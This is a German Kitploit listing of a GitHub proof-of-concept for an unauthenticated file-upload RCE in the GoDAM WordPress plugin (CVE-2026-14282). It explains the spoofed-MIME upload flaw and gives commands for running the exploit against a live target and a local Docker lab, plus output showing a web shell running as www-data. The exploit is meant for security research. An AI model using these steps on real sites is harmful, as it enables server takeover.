Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-14282 — GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282) | Kitploit
Tools/GitHubGitHub/nullwhisper/cve-2026-14282
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLabs & Practice
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)

Repository anzeigen
1vor 8 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-14282 — GoDAM WordPress Plugin <= 1.12.2 Nicht authentifizierter Datei-Upload -> RCE

Autor: nullwhisper
Verwendungszweck: nur für autorisierte Sicherheitsforschung / Schwachstellenvalidierung.

Was ist das?

Die GoDAM-WordPress-Plugin-Versionen <= 1.12.2 registrieren ein WPForms-Feld namens godam_record. Der Upload-Handler save_video_file() ist an die öffentliche Aktion wpforms_process_before_filter gebunden und wird daher vor jeder Authentifizierungsprüfung ausgeführt. Der Handler vertraut dem vom Angreifer kontrollierten Content-Type-Header, akzeptiert eine PHP-Datei, solange der MIME-Typ mit video/ beginnt, und verschiebt sie in das vom Webserver ausgelieferte Verzeichnis wp-content/uploads/godam/wpforms/. Dadurch kann ein nicht authentifizierter Angreifer beliebigen PHP-Code hochladen und ausführen.

  • CVE: CVE-2026-14282
  • Produkt: GoDAM WordPress plugin
  • Betroffen: <= 1.12.2
  • Behoben: 2.0.0
  • Typ: Nicht authentifizierter beliebiger Datei-Upload, der zu RCE führt
  • CVSS: 9.8 (Kritisch)

Referenzen

  • IONIX-Advisory: https://www.ionix.io/threat-center/cve-2026-14282/
  • CVE-Eintrag: https://www.cve.org/CVERecord?id=CVE-2026-14282
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
  • WordPress.org-Plugin-Seite: https://wordpress.org/plugins/godam/

Dateien

root@kitploit:~
.
├── cve_2026_14282_poc.py   # Main PoC
├── lab/
│   ├── docker-compose.yml  # WordPress lab
│   └── setup.php           # Creates a WPForms form with GoDAM field
├── requirements.txt
└── README.md

Installation

root@kitploit:~
pip3 install -r requirements.txt

Verwendung

Live-Ziel

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form

Das Skript erkennt die WPForms-Formular-ID und die GoDAM-Feld-ID automatisch. Wenn die Seite mehrere Formulare enthält oder die Erkennung fehlschlägt, verwende:

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
    --form-id 4 --field-id 1 --cmd "whoami"

Lokales Labor

  1. Lade die verwundbaren Plugins herunter (gib die Binärdateien nicht weiter):

    root@kitploit:~
    mkdir -p lab/wpforms-lite lab/godam
    cd lab/wpforms-lite
    wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
    unzip wpforms-lite.latest-stable.zip
    rm wpforms-lite.latest-stable.zip
    cd ../godam
    wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
    unzip godam.1.12.2.zip
    rm godam.1.12.2.zip
    cd ../..
    
  2. Starte das Labor:

    root@kitploit:~
    cd lab
    docker compose up -d
    
  3. Schließe den WordPress-Installer unter http://127.0.0.1:8092 ab.

  4. Installiere und aktiviere die Plugins und erstelle dann das Formular und die Testseite:

    root@kitploit:~
    docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
    docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Führe den PoC aus:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
    

Auf localhost verifiziert

Getestet mit WordPress 6.8 + WPForms Lite (aktuellste Version) + GoDAM 1.12.2.

root@kitploit:~
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED

Warum die Plugin-Binärdateien nicht enthalten sind

Dieses Repository enthält nur den PoC und die Orchestrierungsdateien für das Labor. Die verwundbaren Plugin-Binärdateien sind nicht enthalten, um Bloat und Verteilungsprobleme zu vermeiden. Lade die jeweiligen verwundbaren Versionen für dein eigenes Labor von WordPress.org herunter.

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Verwende es nicht gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Code verursacht werden.

Tool herunterladen